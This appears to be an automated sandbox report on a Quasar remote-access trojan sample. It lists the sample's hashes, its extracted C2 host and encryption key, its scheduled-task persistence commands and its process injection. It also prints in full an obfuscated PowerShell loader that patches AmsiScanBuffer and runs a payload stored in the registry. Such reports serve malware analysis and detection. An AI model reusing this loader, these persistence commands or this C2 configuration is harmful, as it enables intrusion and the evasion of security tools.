Analysis
-
max time kernel
158s -
max time network
168s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system -
submitted
10-05-2024 06:29
General
-
Target
R0X-Built.exe
-
Size
409KB
-
MD5
ca46bdb39ae5def0cbcb622d2daf18ee
-
SHA1
e4fade184792a622eecbb60e6e10affd9b1f9625
-
SHA256
ffb2649845e8ebbf318b01537f3bf87fa2f3ae48a0cc5109985abbfa7e2d4bce
-
SHA512
01d8ad45700c3a24a48806256a571e239f3d76c58820a9dfbea0d5a8429e0abd965e1ce16e5e8fc275b8b9769be44a987ed3caac7da313729221ec43c073ee0c
-
SSDEEP
6144:RMb9p1kREG60olEOs1ddczFPWoqKslar9Z5fRpna0bBQv4rd5aP70A6OocBA/e9t:epiREGJDOs1dqzJNqKlaQQocBA/e9km
Malware Config
Extracted
quasar
3.1.5
Slave
looking-memphis.gl.at.ply.gg:45119
$Sxr-3vDee7FzoJnhqjuE3n
-
encryption_key
0LYfxXR7fIiRTzixPrdb
-
install_name
$srr-powershell.exe
-
log_directory
Logs
-
reconnect_delay
1000
-
startup_key
$srr-powershell
-
subdirectory
Windows
Signatures
-
Quasar payload 2 IoCs
Processes:
resource  yara_rule
behavioral1/memory/4580-1-0x0000000000AB0000-0x0000000000B1C000-memory.dmp  family_quasar
C:\Windows\SysWOW64\Windows\$srr-powershell.exe  family_quasar
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
description  pid  process  target process
PID 764 created 612  764  powershell.EXE  winlogon.exe
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
pid  process
2196  $srr-powershell.exe
5020  install.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow  ioc
45  ip-api.com
-
Drops file in System32 directory 12 IoCs
Processes:
description  ioc  process
File opened for modification  C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04  OfficeClickToRun.exe
File opened for modification  C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749  svchost.exe
File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk  DllHost.exe
File opened for modification  C:\Windows\SysWOW64\Windows\$srr-powershell.exe  R0X-Built.exe
File opened for modification  C:\Windows\SysWOW64\Windows  $srr-powershell.exe
File created  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.EXE
File opened for modification  C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx  svchost.exe
File opened for modification  C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506  svchost.exe
File created  C:\Windows\SysWOW64\Windows\$srr-powershell.exe  R0X-Built.exe
File opened for modification  C:\Windows\SysWOW64\Windows\$srr-powershell.exe  $srr-powershell.exe
File created  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log  powershell.EXE
File opened for modification  C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04  OfficeClickToRun.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
description  pid  process  target process
PID 764 set thread context of 1060  764  powershell.EXE  dllhost.exe
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid  process
3640  schtasks.exe
3484  schtasks.exe
1400  SCHTASKS.exe
-
Modifies data under HKEY_USERS 43 IoCs
Processes:
description  ioc  process
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing  OfficeClickToRun.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections  svchost.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates  powershell.EXE
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates  powershell.EXE
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid  process
764  powershell.EXE  (4 entries)
1060  dllhost.exe  (60 entries)
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
description  pid  process
Token: SeDebugPrivilege  4580  R0X-Built.exe
Token: SeDebugPrivilege  2196  $srr-powershell.exe
Token: SeDebugPrivilege  764  powershell.EXE
Token: SeDebugPrivilege  764  powershell.EXE
Token: SeDebugPrivilege  1060  dllhost.exe
Token: SeShutdownPrivilege  3428  Explorer.EXE
Token: SeCreatePagefilePrivilege  3428  Explorer.EXE
Token: SeShutdownPrivilege  1016  dwm.exe
Token: SeCreatePagefilePrivilege  1016  dwm.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description  pid  process  target process
PID 4580 wrote to memory of 3640  4580  R0X-Built.exe  schtasks.exe  (3 entries)
PID 4580 wrote to memory of 2196  4580  R0X-Built.exe  $srr-powershell.exe  (3 entries)
PID 2196 wrote to memory of 3484  2196  $srr-powershell.exe  schtasks.exe  (3 entries)
PID 4580 wrote to memory of 5020  4580  R0X-Built.exe  install.exe  (3 entries)
PID 4580 wrote to memory of 1400  4580  R0X-Built.exe  SCHTASKS.exe  (3 entries)
PID 764 wrote to memory of 1060  764  powershell.EXE  dllhost.exe  (8 entries)
PID 1060 wrote to memory of 612  1060  dllhost.exe  winlogon.exe
PID 1060 wrote to memory of 668  1060  dllhost.exe  lsass.exe
PID 1060 wrote to memory of 940  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 1016  1060  dllhost.exe  dwm.exe
PID 1060 wrote to memory of 1044  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 1116  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 1124  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 1140  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 1148  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 1224  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 1308  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 1332  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 1372  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 1416  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 1576  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 1596  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 1652  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 1696  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 1724  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 1772  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 1828  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 1880  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 1892  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 2008  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 2024  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 2072  1060  dllhost.exe  spoolsv.exe
PID 1060 wrote to memory of 2164  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 2240  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 2380  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 2388  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 2520  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 2528  1060  dllhost.exe  sihost.exe
PID 1060 wrote to memory of 2580  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 2628  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 2668  1060  dllhost.exe  sysmon.exe
PID 1060 wrote to memory of 2688  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 2704  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 2724  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 2736  1060  dllhost.exe  taskhostw.exe
PID 1060 wrote to memory of 2812  1060  dllhost.exe  svchost.exe
PID 1060 wrote to memory of 3092  1060  dllhost.exe  unsecapp.exe
Processes (child processes indented under their parent)
C:\Windows\system32\winlogon.exe
  command line: winlogon.exe
    C:\Windows\system32\dwm.exe
      command line: "dwm.exe"
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\dllhost.exe
      command line: C:\Windows\System32\dllhost.exe /Processid:{6b217f98-80eb-430e-a854-b5ea1035d0d9}
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
C:\Windows\system32\lsass.exe
  command line: C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
  - Drops file in System32 directory
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
    C:\Windows\system32\taskhostw.exe
      command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bxJrexNUPrsE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$oyGDOiatFFpECb,[Parameter(Position=1)][Type]$BUMrriBLVF)$SUlVRZaDYCV=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+'mo'+[Char](114)+'yM'+'o'+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+''+'a'+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+'s'+''+[Char](44)+'Pub'+[Char](108)+''+[Char](105)+'c'+','+''+[Char](83)+'ea'+[Char](108)+'e'+'d'+''+[Char](44)+''+'A'+'n'+'s'+''+[Char](105)+''+[Char](67)+''+'l'+''+'a'+'s'+[Char](115)+''+[Char](44)+''+'A'+''+'u'+''+'t'+'o'+[Char](67)+''+[Char](108)+'a'+'s'+'s',[MulticastDelegate]);$SUlVRZaDYCV.DefineConstructor(''+'R'+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+'l'+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+'i'+[Char](103)+''+','+'Pub'+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$oyGDOiatFFpECb).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+'i'+''+[Char](109)+'e'+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+'e'+'d');$SUlVRZaDYCV.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)
+''+'i'+''+'g'+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+'S'+'l'+''+'o'+''+'t'+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+'l',$BUMrriBLVF,$oyGDOiatFFpECb).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'ti'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $SUlVRZaDYCV.CreateType();}$EuzzAYaxJWVgM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+'m'+'.'+'d'+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+'ic'+[Char](114)+''+'o'+'s'+[Char](111)+''+[Char](102)+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+'.'+'U'+''+'n'+'sa'+[Char](102)+'e'+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+'e'+[Char](116)+'ho'+'d'+''+[Char](115)+'');$ZoPQybvFFOzvdH=$EuzzAYaxJWVgM.GetMethod(''+[Char](71)+'et'+[Char](80)+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+'d'+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('P'+[Char](117)+'bl'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$crtwHMmDayxJUPAhQiB=bxJrexNUPrsE @([String])([IntPtr]);$PvZmALJHZRIKZPdZjXuBoH=bxJrexNUPrsE 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aQTVQOagjfU=$EuzzAYaxJWVgM.GetMethod('Ge'+'t'+''+[Char](77)+''+'o'+'d'+[Char](117)+'l'+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+'k'+'e'+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$eJLDJiIHrNYvOg=$ZoPQybvFFOzvdH.Invoke($Null,@([Object]$aQTVQOagjfU,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+''+'A'+'')));$IzByyrqqbnbmKFmOx=$ZoPQybvFFOzvdH.Invoke($Null,@([Object]$aQTVQOagjfU,[Object](''+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+'a'+'l'+''+[Char](80)+''+'r'+''+'o'+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$svTvrlo=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eJLDJiIHrNYvOg,$crtwHMmDayxJUPAhQiB).Invoke('a'+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$FmVYHKWQmcpBoOYeR=$ZoPQybvFFOzvdH.Invoke($Null,@([Object]$svTvrlo,[Object]('A'+[Char](109)+''+[Char](115)+'i'+'S'+'c'+[Char](97)+''+'n'+'B'+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+'r'+'')));$dmEZpqIzdY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IzByyrqqbnbmKFmOx,$PvZmALJHZRIKZPdZjXuBoH).Invoke($FmVYHKWQmcpBoOYeR,[uint32]8,4,[ref]$dmEZpqIzdY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$FmVYHKWQmcpBoOYeR,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IzByyrqqbnbmKFmOx,$PvZmALJHZRIKZPdZjXuBoH).Invoke($FmVYHKWQmcpBoOYeR,[uint32]8,0x20,[ref]$dmEZpqIzdY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+'F'+''+'T'+''+'W'+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+'7'+[Char](115)+''+[Char](116)+''+'a'+''+'g'+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Drops file in System32 directory
      - Suspicious use of SetThreadContext
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
    C:\Windows\system32\sihost.exe
      command line: sihost.exe
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
  command line: C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
  - Drops file in System32 directory
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
  command line: C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\wbem\unsecapp.exe
  command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
  command line: C:\Windows\Explorer.EXE
  - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"
      - Drops file in System32 directory
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\schtasks.exe
          command line: "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f
          - Creates scheduled task(s)
        C:\Windows\SysWOW64\Windows\$srr-powershell.exe
          command line: "C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
          - Executes dropped EXE
          - Drops file in System32 directory
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\schtasks.exe
              command line: "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
              - Creates scheduled task(s)
        C:\Users\Admin\AppData\Local\Temp\install.exe
          command line: "C:\Users\Admin\AppData\Local\Temp\install.exe"
          - Executes dropped EXE
        C:\Windows\SysWOW64\SCHTASKS.exe
          command line: "SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST
          - Creates scheduled task(s)
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
  command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
  command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
  command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
  command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k netsvcs -p
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
  - Modifies data under HKEY_USERS
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
  command line: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
C:\Windows\system32\SppExtComObj.exe
  command line: C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\system32\DllHost.exe
  command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  - Drops file in System32 directory
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
